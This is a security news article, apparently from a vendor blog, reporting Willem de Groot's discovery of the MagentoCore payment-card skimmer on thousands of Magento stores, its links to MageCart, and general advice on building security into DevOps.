Security researcher Willem de Groot uncovered a hacking campaign that has so far affected more than 7,339 websites running on the Magento e-commerce platform. The attacks involve injecting MagentoCore (detected by Trend Micro as JS_MAGENTOSKIMMER.A), a malicious payment card data-stealing script, into the affected websites.
de Groot noted that the hacking campaign entails hijacking the control panel of Magento websites, often through brute-force techniques (successively trying combinations of credentials). Upon successfully gaining access to the content management system (CMS), hackers modify the website by embedding MagentoCore in its webpages. MagentoCore is designed to record keystrokes that it sends to its command-and-control (C&C) server in real time. MagentoCore also searches for similar malware in the affected website and deletes them, and modifies the password of usernames in the website.
Based on de Groot’s scans, around 50 to 60 new Magento stores are being compromised per day, and that the affected businesses include multinationals. A PublicWWW search also reveals that, as of this writing, there are 5,214 web pages containing MagentoCore. de Groot notes that MagentoCore affects at least 4.2 percent of Magento-based websites worldwide.
Given MagentoCore’s capabilities, its adverse impact is not limited to information theft. MagentoCore, for instance, drops a backdoor to auto-update as well as retrieve and run malicious code, then cover its tracks by deleting itself.
de Groot and other security researchers said that these attacks are part of a larger cybercriminal campaign operated by the MageCart group that has reportedly been active as far back as 2015. MagentoCore and its C&C server as well as the tactics used were linked to different groups working under MageCart. Last July, researchers traced the data breach of U.K.-based Ticketmaster to MageCart. The hackers hijacked the third-party components integrated into Ticketmaster’s websites and modified them with credit card-skimming code. de Groot said MageCart also targets the WooCommerce e-commerce plugin in Wordpress.
MagentoCore exemplifies the significance of security by design: safeguarding the underlying infrastructures and components used to run websites or applications. This is especially true for businesses adopting DevOps, where the need to deploy software as fast as possible precedes security. While enriching user and customer experience helps bring in more business — and keeping the website, software, or application up and running — security shouldn’t be afterthought. For DevOps teams, this means security as code: baking security early into the development process to avoid unnecessary work, significantly reduce disruptions, and address gaps faster.
For DevOps teams and website, IT, and system administrators, here are some best practices for defending against threats such as MagentoCore:
Like it? Add this infographic to your site:
1. Click on the box below. 2. Press Ctrl+A to select all. 3. Press Ctrl+C to copy. 4. Paste the code into your page (Ctrl+V).
Image will appear the same size as you see above.